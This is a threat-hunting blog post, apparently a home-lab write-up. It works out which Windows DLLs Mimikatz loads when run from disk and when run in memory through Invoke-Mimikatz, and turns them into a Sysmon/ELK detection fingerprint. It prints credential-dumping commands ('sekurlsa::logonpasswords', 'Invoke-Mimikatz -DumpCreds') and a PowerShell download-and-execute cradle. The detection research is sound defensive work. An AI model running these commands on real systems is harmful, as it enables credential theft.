Saturday, March 11, 2017

Chronicles of a Threat Hunter: Hunting for In-Memory Mimikatz with Sysmon and ELK - Part I (Event ID 7)

This post marks the beginning of the "Chronicles of a Threat Hunter" series where I will be sharing my own research on how to develop hunting techniques. I will use open source tools and my own lab at home to test real world attack scenarios.

In this first post, I will show you the beginning of some research I have been doing recently with Sysmon in order to hunt for when Mimikatz is reflectively loaded in memory. This technique is used to dump credentials without writing the Mimikatz binary to disk.

  • Invoke-Mimikatz.ps1 Author: Joe Bialek, Twitter: @JosephBialek
  • Mimikatz Author: Bejamin Delpy 'gentilkiwi', Twitter: @gentilkiwi 

This first part will cover how we could approach the detection of in-memory Mimikatz by focusing on the specific Windows DLLs that it needs to load in order to work (no matter what process it is running from and if it touches disk or not). I will compare the results when Mimikatz is run on disk and in memory to see the specific DLLs needed on both scenarios.There is an article that talks about this same approach, but I feel that it could be improved upon. It is still a good read, and I love the approach. You can read it here


  • Sysmon installed (I have version 6 installed)
  • Winlogbeat forwarding logs to an ELK Server
  • I recommend to read my series "Setting up a Pentesting.. I mean, a Threat Hunting Lab" specially parts 5 & 6 to help you set up your environment.
  • Mimikatz binary (Version 2.1 20170305)
  • Invoke-Mimikatz
  • notepad++ - Great local editor for your Sysmon configs.

Mimikatz Overview

Mimikatz is a Windows x32/x64 program coded in C by Benjamin Delpy (@gentilkiwi) in 2007 to learn more about Windows credentials (and as a Proof of Concept).  There are two optional components that provide additional features, mimidrv (driver to interact with the Windows kernal) and mimilib (AppLocker bypass, Auth package/SSP, password filter, and sekurlsa for WinDBG). Mimikatz requires administrator or SYSTEM and often debug rights in order to perform certain actions and interact with the LSASS process (depending on the action requested) [Source]. Mimikatz comes in two flavors: x64 or Win32, depending on your windows version (32/64 bits). Win32 flavor cannot access 64 bits process memory (like lsass), but can open 32 bits minidump under Windows 64 bits. It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. Mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets. [Source]

In-Memory Mimikatz

What gives Invoke-Mimikatz its “magic” is the ability to reflectively load the Mimikatz DLL (embedded in the script) into memory [Source]. However, it needs other native Windows DLLs loaded on disk in order to do its job.

Event ID 7: Image loaded

The image loaded event logs when a module is loaded in a specific process. This event is disabled by default and needs to be configured with the –l option. It indicates the process in which the module is loaded, hashes and signature information. The signature is created asynchronously for performance reasons and indicates if the file was removed after loading. This event should be configured carefully, as monitoring all image load events will generate a large number of events. [Source]

Getting ready to hunt for Mimikatz

Getting a Sysmon Config ready

The main goal is to monitor for "Images Loaded" when Mimikatz gets executed. However, first we have to make sure that we understand what "normal" looks like. Therefore, the first think that I recommend to do is to monitor images getting loaded by the process which will be executing Mimikatz in its two forms (the Mimikatz binary and Invoke-Mimikatz). We will test Mimikatz on disk first. This first step of logging Images loaded by the process executing mimikatz will be more helpful when we test the Invoke-Mimikatz script, but it is a good exercise for you to understand the testing methodology.

The process that I used for this first test was "PowerShell.exe" so I created a basic Sysmon configuration to only log images loaded by this process. It is available in github as shown below. 

Download and save the Sysmon config in a preferred location of your choice as shown in Figure 1 below.

Figure 1. Saving custom sysmon config.

Update your Sysmon rules configuration. In order to do this, make sure you run cmd.exe as administrator, and use the the configuration you just downloaded as shown in figure 3 below. Run the following commands:

Sysmon.exe -c [Sysmon config xml file]

Then, confirm if your new config is running by typing the following:

sysmon.exe -c   (You will notice that the only things being logged will be Images loaded by "PowerShell" as shown in figure 3 below.)

Figure 2. Running cmd.exe as an Administrator.

Figure 3. Updating your Sysmon rules configuration. 

You should be able to open your Event Viewer and verify that the last event logged by Sysmon was Event ID 16 which means that your Sysmon config state changed. You should not get any other events after that unless you launch PowerShell. If so, try to update your config one more time as shown in figure 3 above.

Figure 4. Checking Sysmon logs with the Event Viewer console.

Delete/Clean your Index 

If you open your Kibana console and filter your view to show only Sysmon logs, you will see old records that were sent to your ELK server before updating your Sysmon config. In order to be safe and make sure you don't have old Images loaded that might interfere with your results, I recommend to delete/clear your Index by running the following command as shown in figure 6 below:

curl -XDELETE 'localhost:9200/[name of your index]?pretty'

If you are using my Logstash configs, an index gets created as soon as it passes data to your elasticsearch.

Figure 5. Old Sysmon logs displayed on your Kibana console.

Figure 6. Clearing contents of your main Index. (Clearing Logs)

Now, if you refresh your view (filtering only to show Sysmon logs again), you should not see anything unless you execute PowerShell.

Figure 7. No Sysmon logs in ElasticSearch yet.

Create a Visualization for "ImageLoaded" events

I do this so that I can group events and visualize data properly instead of using the event viewer. To get started do the following:

  • Click on "Visualize"on the left panel
  • Select "Data Table" as your visualization type

Figure 8. Creating a new visualization. Data Table type.

Select the index you want to use (In this case, the only one available is Winlogbeat)

Figure 9. Selecting the right index for the visualization.

As shown in figure 10 below:

  • Select the "Split Rows" bucket type
  • Select the aggregation type "Terms"
  • Select the data field for the visualization (event_data.ImageLoaded.keyword)
  • By default data will be ordered "Descending".
  • Set the number of records to show to "200" (We do this to make sure we show all the modules being loaded)

Figure 10. Creating visualization.

Click on "options" and set the "Per Page" value to show 20 results per page. Remember we set this visualization to show the top 200 records in figure 10 above, and now to show 20 records per page. If you end up having 10 pages full of records, then you might want to increase the number of records to show more than 200 since you might not be showing all the results.

Figure 11. Setting visualization options.

Give a name to your new visualization and save it.

Figure 12. Saving visualization.

Figure 13. Saving visualization.

Creating a simple dashboard to add our visualization

To get started do the following:

  • Click on "Dashboard" on the left panel. (Figure 14)
  • Click on "Add" on the options above your Kibana search bar. (Figure 15)

Figure 14. Creating a new dashboard.

Select the visualization we just created for Images loaded. This will add the visualization to your dashboard.

Figure 15. Adding our new visualization.

Figure 16. Visualization added to our new dashboard.

Save your new dashboard:

  • Click on "Save" between the options "Add" and "Open".
  • Give your dashboard a name and save it.

Figure 17. Saving new dashboard.

Figure 18. Saving new dashboard.

Testing/Logging Images loaded by PowerShell

As I stated before, if we want to detect anomalies, we have to first understand what normal looks like. Therefore, in this section, we will find out what images get loaded when PowerShell is launched in order to start creating a baseline.

To get started, launch PowerShell and close it.

Figure 19. Opening PowerShell.

Next, refresh your dashboard by clicking on the magnifier glass icon located to the right of the Kibana Search bar. You will see that there are several images/modules that were loaded when PowerShell executed as shown in figure 20 below. 

Figure 20. Logging Images loaded by PowerShell.

If we go to our last page, page #4, we can see that there are 12 results on a 20 per page setup. This means that we have 3 pages with 20 records and 1 with 12. Therefore, we can say that PowerShell loads 72 images when we open it and close it.

Figure 21. Logging Images loaded by PowerShell.

Now in order to verify that PowerShell loads 72 images most of the time, I opened and closed PowerShell 4 times as shown in figure 22 below.

Figure 22. Opening and closing PowerShell 4 times.

Once you refresh your dashboard again, you will see that we have the same images being loaded and the number (Count) of images increased by 4. We now see a count of 5 for every single unique Image loaded. A total again of 72 unique images loaded 5 times. Until this point, it is clear that PowerShell only loads 72 images when it starts for basic functionalities (Default). We are now ready to test Mimikatz on disk.

Figure 23. Images loaded by PowerShell after being opened and closed 4 more times.

Figure 24. Images loaded by PowerShell after being opened and closed 4 more times.

Detecting Mimikatz on Disk

Download the latest Mimikatz Trunk

Our first test will be running the Mimikatz binary available here as shown in figure 25.

Figure 25. Downloading Mimikatz binaries.

Download and save your Mimikatz folder in a preferred location of your choice as shown in figure 26 below. I show you this because it is important that you remember the right path of the mimikatz binary you will use for the first test. We will need the path to update our sysmon config and log the images loaded by the mimikatz binary.

Figure 26. Downloading Mimikatz binaries.

Edit and Update your Sysmon config

Add another rule to the configuration we used earlier. Open the config with notepad++ and add another "Image" rule specifying the path to mimikatz.exe as shown in figure 28.

Figure 27. Editing our Sysmon config.

Figure 28. Editing our Sysmon config.

Open cmd.exe as administrator and run the following commands as shown in figure 29 below:

sysmon.exe -c [edited sysmon xml file]

Then, confirm that the changes were applied by running the following command:

sysmon.exe -c   (You will see that our new rule now shows up below our PowerShell one)

Figure 29. Updating Sysmon rule configuration.

TIP: Extend the Time Range of your Dashboard

Remember that by default your Dashboard is set to show the last 15 minutes of data stored in elasticsearch. I always extend my time range to 15 or 30 minutes to make sure I still show logs that were captured more than 15 minutes ago (That is sometimes how much time it takes me to do all the extra stuff to get ready or I just simply get distracted). It depends on how much time you take between each update or change you make to your config or strategy. You just want to make sure that your time range is right in order to capture all your results.

Figure 30. Extending the time range of your dashboard.

Running Mimikatz on Disk

Now that we have everything ready, lets first run PowerShell as Administrator. If you refresh your dashboard, the count of almost every single image/module will be increased by 1 as shown in figure 32 below.

Figure 31. Running PowerShell as Administrator.

Figure 32. PowerShell opened as Administrator.

Now, it is really important to make sure we do not load extra images that could be mixed with modules loaded by the Mimikatz binary. Before running Mimikatz, I wanted to show you what happens when you fat finger a command in PowerShell. Yes, it actually loads an image named diasymreader.dll as shown in figure 34 below. Therefore, if you fat finger the wrong arguments while executing Mimikatz, make sure you do not count diasymreader.dll as part of your results.

Figure 33. Testing  wrong arguments in PowerShell

One important thing also to mention is that PowerShell loads netutils.dll when the console closes. Therefore, since we are not closing our PowerShell console yet, you will still see netutils.dll with a count of 5 and not 6. We are using our High integrity PowerShell process to run mimikatz so we cant close it yet.

Figure 34. Extra image loaded by PowerShell after executing wrong arguments.

It is time to test our Mimikatz binary. Change your directory to the one where the Mimikatz binary is stored (I used the x64 one). Launch the following commands and close your PowerShell console:

.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

Figure 35. Running Mimikatz on disk.

Next, refresh your dashboard. You will see that our count for every single image on page 1 increased by 1. That means that Mimikatz also loads those images when it executes. This is an important first finding because those first images might not be unique enough to be used to fingerprint Mimikatz.

Figure 36. Images loaded after executing Mimikatz on disk.

If you go to page #4, you will see that we start to see a few unique ones loaded by mimikatz (remember that diasymreader.dll was not loaded by mimikatz). Also, you can see that image mimikatz.exe was loaded 4 times and by PowerShell of course.

Figure 37. Images loaded after executing Mimikatz on disk.

If you go to the next page, page #5, you can see the last unique images loaded by mimikatz. Now this is good for this exercise because we can at least have a basic understanding of the, so far, unique images being loaded by mimikatz when executed on disk.

Figure 38. Images loaded after executing Mimikatz on disk.

What if I want to see images loaded by Mimikatz only?

What I like about using Kibana is that I can filter out or group data records with unique characteristics. Lets say you want to select only images loaded by Mimikatz.exe. We will have to create an extra visualization and add it to our dashboard. You could also type a query on the Kibana Search bar to accomplish that, but I prefer to have an extra visualization that I can interact with too (good exercise).

As explained before, in order to create a visualization, click on Visualize on the left panel, and it will automatically take you to edit the only visualization that we have in our dashboard. Next, click on "New" to create a new visualization as shown in figure 39 below.

Figure 39. Creating a new visualization.

Select Data Table for the visualization type and Winlogbeat for the index.

Figure 40. Creating a new visualization.

For this visualization, do the following:

  • Set the field to event_data.Image.keyword
  • Give it a name and save it

Figure 41. Creating a new visualization.

Figure 42. Saving the new visualization.

Click on Dashboard on the left console, and add the new visualization to your dashboard as shown in figure 43 below.

Figure 43. Adding visualization to dashboard.

You will see that now we have better numbers to show per Image (PowerShell.exe & Mimikatz.exe). You can see that PowerShell loaded 437 images overall. That makes sense because we know that it loads 72 images every time it opens and closes, and we used it 6 times which gives us 432 images. We also made PowerShell load one extra image when I showed you what happened when you fat finger a command so with that one we would have 433. Plus the other 4 images named mimikatz.exe that were loaded when we used PowerShell to execute the Mimikatz binary. All that gives us our 437 images loaded as shown in figure 44.

Figure 44. New visualization added to dashboard.

Then, what you can do with this new visualization is to click on the Image "C:\Tools\mimikatz_trunk\x64\mimikatz.exe" and it will automatically create a filter to show only the images loaded by your selection as shown in figure 46 below.

Figure 45. Images loaded only by PowerShell and Mimikatz.

Figure 46. Images loaded only by Mimikatz.

Figure 47. Images loaded only by Mimikatz.

You can also download all the results of the visualization Images_Loaded by clicking on the option "Formatted" below the data table results.That will allow you to export all the results in a CSV format. Save it and open it to highlight a few things.

Figure 48. Exporting results of images loaded in a CSV format.

Figure 49. Saving CSV file.

Open the file and highlight the unique images that were loaded by Mimikatz when it was run on disk. That will help you to document your results. So far, we can consider the highlighted images to be our initial fingerprint for Mimikatz. That will change of course when you start collecting modules being loaded by other programs and comparing results.

Figure 50. Result of images loaded after executing Mimikatz on disk.

Detecting In-memory Mimikatz

Delete/Clean your Index

Our next test will be launching mimikatz reflectively in memory. To get started delete/clear your index as shown in figure 51 below.

Figure 51. Deleting Index.

Refresh your dashboard to confirm that the index was deleted/cleared.

Figure 52. Empty Dashboard.

Getting ready to run Invoke-Mimikatz

Invoke-Mimikatz is not updated when Mimikatz is, though it can be (manually). One can swap out the DLL encoded elements (32bit & 64bit versions) with newer ones. Will Schroeder (@HarmJ0y) has information on updating the Mimikatz DLLs in Invoke-Mimikatz (it’s not a very complicated process). The PowerShell Empire version of Invoke-Mimikatz is usually kept up to date. [Source]

Figure 53. Empire's latest Invoke-Mimikatz script.

Figure 54. Empire's latest Invoke-Mimikatz script.

As shown before in figure 22 when we were getting ready to run the mimikatz binary, we want to make sure that we have a basic baseline of images/modules being loaded by PowerShell when it is opened and closed. Open and close PowerShell 4 times as shown in figure 55 below.

Figure 55. Opening and closing PowerShell 4 times.

We can see the same 72 images being loaded 4 times. It should show a total of 288, but there might have been a delay making it to the server. I probably refreshed my dashboard to soon and did not capture the last netutils.dll load which happens when PowerShell exits. Anyways, I think that we have a good basic baseline before running mimikatz reflectively in the same PowerShell process.

Figure 56. Images loaded by PowerShell before running Mimikatz.

Baselining how PowerShell will download Invoke-Mimikatz

The easiest way to test Invoke-Mimikatz is by going to its github repo and downloading it before executing it in memory. We have to make sure that we understand what extra images PowerShell needs to load in order to perform network operations and download Invoke-Mimikatz as a string. We can use the same approach of opening and closing PowerShell and run only the commands that will pull the script as a string from Github without executing it yet as shown in figure 57 below.

IEX (New-Object Net.WebClient).DownloadString('')

Figure 57. Running commands to only download Invoke-Mimikatz.

Next, refresh your dashboard and as you already know, you will have most of the unique images count increased by one as shown in figure 58 below.

Figure 58. Checking initial images loaded by PowerShell to download Invoke-Mimikatz from Github.

Now, if you go to the page #4, you will start to see new unique images/modules. Those are images loaded by PowerShell to perform the "DownloadString" operation. You can go to page #5 too as shown in figure 60, and you will see more unique images. (You can expand your first visualization to see the long paths of a few images. The second visualization we added to the dashboard earlier will just move down)

Figure 59. Unique Images loaded by PowerShell to download Invoke-Mimikatz from Github.

Figure 60. More unique images loaded by PowerShell to download Invoke-Mimikatz from Github.

Then, we can perform the same operation (Downloading Invoke-Mimikatz from Github as a string) to make sure we have a strong fingerprint for that particular action and avoid mixing it with images loaded when Mimikatz is executed in memory. I opened PowerShell three times, executed the same commands to only download Invoke-Mimikatz as a string, and closed them all as shown in figure 61. 

Figure 61. Downloading Invoke-Mimikatz as a string three times.

Then, you will see that the counts for the initial images loaded by PowerShell were increased by 3, but if you go to page #5 as shown in figure 63, you can see our "DownloadString" images loaded 4 times.

Figure 62. Images loaded by PowerShell after downloading Invoke-Mimikatz as a string 3 more times.

Figure 63. Images loaded by PowerShell after downloading Invoke-Mimikatz as a string 3 more times.

Running Mimikatz in Memory

to get started run PowerShell as administrator.

Figure 64. Running PowerShell as Administrator.

In order to download Invoke-Mimikatz as a string from Github and run it in memory, type the following commands:

IEX (New-Object Net.WebClient).DownloadString(''); Invoke-Mimikatz -DumpCreds

Figure 65. Running Mimikatz in memory.

You will of course get the same results as when it was run on disk. Close your PowerShell console.

Figure 66. Results from running Mimikatz.

Analyzing In-Memory Mimikatz Results

After closing PowerShell, refresh your dashboard (Make sure you have the right Time Range), and you will see that our initial default images loaded by PowerShell were only increased by 1 and not by 2 as when we ran Mimikatz on disk. This is because the Mimikatz binary is run reflectively inside of PowerShell, and several of the modules needed are already loaded by PowerShell itself.

Figure 67. Images loaded by PowerShell when Mimikatz is executed reflectively in memory.

Next, if you go to page #5, you will see that the images loaded during the "DownloadString" operation increased by one (count of 5 now as expected). In addition, we can see one of the images that was also loaded while executing Mimikatz on disk:
  • C:\Windows\System32\WinSCard.dll

However, there are four new images that were loaded when Mimikatz was executed reflectively in memory. (I will explain later why those get loaded when we run Invoke-Mimikatz)

  • C:\Windows\System32\whoami.exe
  • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\WMINet_Utils.dll
  • C:\Windows\System32\NapiNSP.dll
  • C:\Windows\System32\RpcRtRemote.dll

Figure 68.  Images loaded by PowerShell when Mimikatz is executed reflectively in memory.

On page #6, we can also see a few new images that we did not see when Mimikatz ran on disk. (I will explain later why those get loaded when we run Invoke-Mimikatz).
  • C:\Windows\System32\nlaapi.dll
  • C:\Windows\System32\ntdsapi.dll
  • C:\Windows\System32\pnrpnsp.dll
  • C:\Windows\System32\wbem\fastprox.dll
  • C:\Windows\System32\wbem\wbemprox.dll
  • C:\Windows\System32\wbem\wbemsvc.dll
  • C:\Windows\System32\wbem\wmiutils.dll
  • C:\Windows\System32\wbemcomn.dll
  • C:\Windows\System32\winrnr.dll

However, we can also see almost the rest of the images that were loaded when Mimikatz was executed on disk.

  • C:\Windows\System32\apphelp.dll
  • C:\Windows\System32\cryptdll.dll
  • C:\Windows\System32\hid.dll
  • C:\Windows\System32\logoncli.dll
  • C:\Windows\System32\netapi32.dll
  • C:\Windows\System32\samlib.dll
  • C:\Windows\System32\vaultcli.dll
  • C:\Windows\System32\wintrust.dll
  • C:\Windows\System32\wkscli.dll

I dont see the following modules (Loaded by Mimikatz on disk) as unique ones anymore (count 1). This is because they are used to handle encryption and were part of the "DownloadString" operation base-lining. We handled encrypted traffic with Github so it makes sense. It is safe to say that those modules will be noisy (it does not mean that they do not get loaded while running Mimikatz in Memory though. It is just that PowerShell loads them first to handle the encrypted traffic.)

  • C:\Windows\System32\bcrypt.dll
  • C:\Windows\System32\bcryptprimitives.dll
  • C:\Windows\System32\ncrypt.dll

 Figure 69. Images loaded by PowerShell when Mimikatz is executed reflectively in memory.

You can reduce the width of the first visualization and the second one that we added earlier should move back up next to the first one. This is just so that you can see the total number of images loaded by PowerShell at the end of this test.

 Figure 70. Images loaded by PowerShell when Mimikatz is executed reflectively in memory.

In order to document your findings, export the results to a CSV file by clicking on the option "formatted" below the "Images_Loaded" results, and save it to your computer as shown in figure 71.

 Figure 71. Exporting results to a CSV file.

Comparing Results

As we can see in figure 72 below, it does not matter if Mimikatz is executed on disk or in memory. It still loads the same extra modules it needs in order to work. Most of the modules that Mimikatz needs are already loaded by PowerShell depending on what happens before running script, but we can still see a few unique ones that could allow us to create a basic fingerprint for In-memory Mimikatz. For example, if we take out the 3 modules used for encryption, we can use the other 10 to create a basic detection rule. We could hunt by grouping the following modules being loaded in a second or four seconds bucket time.

  • C:\Windows\System32\WinSCard.dll
  • C:\Windows\System32\apphelp.dll
  • C:\Windows\System32\cryptdll.dll
  • C:\Windows\System32\hid.dll
  • C:\Windows\System32\logoncli.dll
  • C:\Windows\System32\netapi32.dll
  • C:\Windows\System32\samlib.dll
  • C:\Windows\System32\vaultcli.dll
  • C:\Windows\System32\wintrust.dll
  • C:\Windows\System32\wkscli.dll

Figure 72. Comparing results on-disk and in-memory.

What about whoami.exe?

We could add that to our basic In-memory Mimikatz fingerprint. If an adversary is using the exact Invoke-Mimikatz script from the Empire Project, then it will reduce the number of false positives. The whoami part is defined in the main function of Invoke-Mimikatz as you can see in figure 73 below. It is important to note that Invoke-Mimikatz from PowerSploit does not have this command in the script.

Figure 73. Whoami utilized in Invoke-Mimikatz.

What about the modules loaded from the wbem directory and WMINet_Utils?

All that is part of Windows Management Instrumentation (WMI) technology. It provides access to monitor, command, and control any managed object through a common, unifying set of interfaces, regardless of the underlying instrumentation mechanism. WMI is an access mechanism.[Source]. 

But, why do they get loaded when we run Mimikatz in Memory? It is because of a simple command used in the Invoke-Mimikatz script to verify if the PowerShell Architecture (32/bit/64bit) matches the OS architecture. Most of the modules in question were pointing to WMI activity so I just accessed the code and looked for any signs of WMI.

Invoke-Mimikatz uses the command "Get-WmiObject" and the class "Win32_Processor" to find out information about the CPU and to get the "AddressWidth" value which is used to verify the OS Architecture as shown in figure 74 below.

Figure 74. WMI in Invoke-Mimikatz.

So I tested that command in my computer and logged all the modules being loaded by PowerShell. I refreshed my dashboard and I saw that all the modules in question were loaded while executing the following command:

get-wmiobject -class Win32_Processor

Figure 75. Executing get-wmiobject with class Win32_Processor to get information about the CPU.

Figure 76. Images loaded after using WMI.

I want to point out that the following modules can generate a lot of false positives since they can be triggered by simple office applications (x86/x64) and the use of Internet Browsers such as Internet Explorer as shown in figure 77 below:
  • C:\Windows\System32\nlaapi.dll
  • C:\Windows\System32\ntdsapi.dll

Figure 77. Images loaded after using WMI.

In addition, in my opinion, depending on how much WMI is used in your environment, it might be a good idea to start monitoring for at least:
  • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\WMINet_Utils.dll
You can test that in your environment and see how noisy it can get. Log for WMINet_Utils.dll in .NET versions available in your gold image. 

On the other hand, most of the rest of the modules are loaded by several third-party and built-in applications, so they are too noisy and could cause a big number of false positives:

  • C:\Windows\System32\nlaapi.dll
  • C:\Windows\System32\ntdsapi.dll
  • C:\Windows\System32\pnrpnsp.dll
  • C:\Windows\System32\wbem\fastprox.dll
  • C:\Windows\System32\wbem\wbemprox.dll
  • C:\Windows\System32\wbem\wbemsvc.dll
  • C:\Windows\System32\wbem\wmiutils.dll
  • C:\Windows\System32\wbemcomn.dll
  • C:\Windows\System32\winrnr.dll

So far, our detection strategy is still to look for the following 10 modules:
  • C:\Windows\System32\WinSCard.dll
  • C:\Windows\System32\apphelp.dll
  • C:\Windows\System32\cryptdll.dll
  • C:\Windows\System32\hid.dll
  • C:\Windows\System32\logoncli.dll
  • C:\Windows\System32\netapi32.dll
  • C:\Windows\System32\samlib.dll
  • C:\Windows\System32\vaultcli.dll
  • C:\Windows\System32\wintrust.dll
  • C:\Windows\System32\wkscli.dll

How can we test our group of modules and tune it to reduce false positives?

Before thinking on deploying a detection rule like this to your Sysmon config in production, I highly recommend to get a gold image and log every single module loaded by every process or application in the system. I tested this in my own environment at home.

Edit and Update your Sysmon config

Open the sysmon configuration we used for our initial tests and set it to not exclude anything from Event ID 7 - Image Load (Log everything) as shown in figure 79 below. 

Figure 78. Editing current sysmon config.

Figure 79. Editing current sysmon config.

Open cmd.exe as administrator and run the following commands as shown in figure 80 below:

sysmon.exe -c [edited sysmon xml file]

Then, confirm that the changes were applied by running the following command:

sysmon.exe -c   (You will see that now everything for ImageLoad is being logged)

Figure 80. Updating Rule configurations.

Open several applications

We are logging every single Image loaded in our system on the top of our Invoke-Mimikatz findings (DO NOT DELETE/CLEAR YOUR INDEX). We can now open and close applications that a user most likely uses in an organization (Depending on the type of job) as shown in figure 81. 

Figure 81. Open applications on your testing machine.

Make sure that you also have the right Time range assigned to your dashboard since we are still using the logs we gathered from when we ran Invoke-Mimikatz. I set mine to Last 1 hour as shown in figure 83.

Figure 82. Adjusting Time Range.

Refresh your dashboard and you will see a lot of modules being loaded as shown in figure 83 below. You can adjust your visualizations if you want to. That will allow you to see more than 200 images being loaded on your box (That is how many records we set our Images_Loaded  to show)

Figure 83. Several images being loaded.

Hunt for the group of 10 modules

Next, with all that data, we can query for the 10 modules of our initial In-Memory Mimikatz fingerprint as shown in figure 84 and 85 below.

"WinSCard.dll", "apphelp.dll", "cryptdll.dll", "hid.dll", "logoncli.dll", "netapi32.dll", "samlib.dll", "vaultcli.dll", "wintrust.dll", "wkscli.dll"

You will see that 5 out of the 10 modules are still unique from our basic fingerprint (Most of them are used to manage authentication security components and features of the system) as shown in figure 84 below.
  • C:\Windows\System32\WinSCard.dll
  • C:\Windows\System32\cryptdll.dll
  • C:\Windows\System32\hid.dll
  • C:\Windows\System32\samlib.dll
  • C:\Windows\System32\vaultcli.dll

You might be thinking why not netapi32.dll? (It was actually loaded 2 more times. It does not mean that netapi32.dll is not  considered a common binary needed for authentication support. However, since it seems to be used by a few other applications, I rather filter that one out)

Figure 84. Querying for only In-memory Mimikatz fingerprint.

If you want to know what modules/images are being loaded by a specific Image on the EventID7_Images visualization, click on one of them and a filter will be created to show you only images loaded related to your selection. For example, Excel apparently loads apphelp.dll and wintrust.dll from our list of 10 as shown in figure 85 below.

Figure 85. What is loading what?.

Or vice-versa you can click on the loaded image and it will filter everything out to show you the Images that loaded that specific module as shown in figure 86.

Figure 86. What is loading what?

What about other operations where Authentication components are involved?

I cleaned/deleted my index and started paying attention to authentication operations such as logging onto web applications or my computer after rebooting it.

Logging onto the Kibana Web Interface

I opened IE , and the first two modules out of the 10 that get loaded are wintrust.dll and apphelp.dll. Then, I browsed to my ELK's IP address and got a prompt to enter my credentials. I noticed that for IE to do all this, it needed to load 5 out of the 10 modules needed by Mimikatz also as shown in figure 87 below. 3 out of those 5 are still part of the ones required for authentication support.

  • samlib.dll
  • WinSCard.dll
  • vaultcli.dll

Figure 87. Images loaded by IE while authenticating to Kibana.

Logging onto my system after rebooting it

The following processes shown in figure 88 below are the first processes that get started when a system boots up. (The ones with the grayed icons are processes that have already exited the system)

Figure 88. Images loaded by the first processes that get started by your system when it boots up.

So what happens when we look for the 5 modules that so far are considered part of the combination with less false positives against the processes shown in figure 88?

"WinSCard.dll", "cryptdll.dll", "hid.dll", "samlib.dll", "vaultcli.dll"

As you can see below in figure 89, there were hits for all of them but by processes involving authentication. The one with the more hits was "LogonUI.exe" 

Figure 89. "Credential Providers" modules used by a few processes.

When conducting research on that particular process (LogonUI.exe) for a training class I put together for some colleagues, I found out the following:

"Whenever a user hits Ctrl-Alt-Del, winlogon.exe switches to another desktop and launches a special program, logonui.exe, to interact with the user. The user may be logging on initially, (un)locking the desktop, changing her password or some other task, but the user is interacting with logonui.exe on a special desktop, not winlogon.exe on the default desktop. When authenticating, logonui.exe loads DLLs called "credential providers" which can handle the password, smart card or, with a third-party provider, biometric information, to authenticate against the local SAM database, Active Directory, or some other third-party authentication service." [Source]

Therefore, all those 5 modules being loaded together by other processes handling credentials would make sense. We could use this knowledge to filter out a few processes where one would normally enter credentials to authenticate to a certain service or application. For example, processes such as Chrome, IE or even outlook (known for asking your password 50 times a day) would load those modules. SSO via your browser would also load most of those images.

Final Thoughts

Even though this is just part I of detecting In-memory Mimikatz, we are already coming up with a basic fingerprint that will allow us to reduce the number of false positives when hunting for this tool when it is executed in memory.

Based on the number of tests performed, a basic fingerprint for In-memory Mimikatz from a modules perspective could be:
  • C:\Windows\System32\WinSCard.dll
  • C:\Windows\System32\cryptdll.dll
  • C:\Windows\System32\hid.dll
  • C:\Windows\System32\samlib.dll
  • C:\Windows\System32\vaultcli.dll

If you can afford (enough space) to log one more image being loaded in your environment, I think it would be a good idea to monitor for the following module. I only see it being loaded by PowerShell after launching several other applications and logging the modules being loaded.

  • C:\Windows\Microsoft.NET\Framework64\[Versions available]\WMINet_Utils.dll

Hunting Technique recommended

Grouping [Source]

"Grouping consists of taking a set of multiple unique artifacts and identifying when multiple of them appear together based on certain criteria. The major difference between grouping and clustering is that in grouping your input is an explicit set of items that are each already of interest. Discovered groups within these items of interest may potentially represent a tool or a TTP that an attacker might be using. An important aspect of using this technique consists of determining the specific criteria used to group the items, such as events having occurred during a specific time window.This technique works best when you are hunting for multiple, related instances of unique artifacts, such as the case of isolating specific reconnaissance commands that were executed within a specific timeframe."

Therefore, the idea is to group the 5 images/modules mentioned above being loaded in a 1-5 seconds bucket time while possibly filtering out known processes performing that type of behavior. Only a few processes, as far as I can tell, load all 5 modules (not just one or 2 or 3 or 4) during authentication operations. In addition, NONE of the other processes launched during testing loaded the 5 modules together with the WMINet_Utils.dll one. Therefore, I see the value in grouping them together and seeing what processes are loading all of those in a short period of time (seconds).

Once again, this is just part I, and in future posts I will group this approach with other chains of events in order to reduce the number of false positives while hunting for In-Memory Mimikatz. Let me know how it works out for you when logging for those specific modules in your organization. I would highly recommend to take this approach in a gold image first and then log one module at a time to test which might cause several false positives. I would love to hear your results!

Feedback is greatly appreciated!  Thank you.

Update (03/21/2017)

  • Mimikatz New version released 2.1.1 20170320
  • Extra DLL loaded: "Winsta.dll"
  • Really noisy one so it does not change our basic fingerprint.



  1. Great article. I'm a fan of Sysmon+ELK, too. I like your straightforward analysis of what somewhat unique set of DLLs invoke-mimikatz uses. It's pretty much how I'd analyze it, too:)

    1. Thank you very much for your feedback K.Merrit. I would love to see some of your work with Sysmon & ELK too! Im always looking to learn new techniques and methodologies for what I do. :)

  2. This is awesome! Definitely going to give this a go.

    1. Great! Thank you JaminB, let me know how it goes. Looking forward to hearing your results :)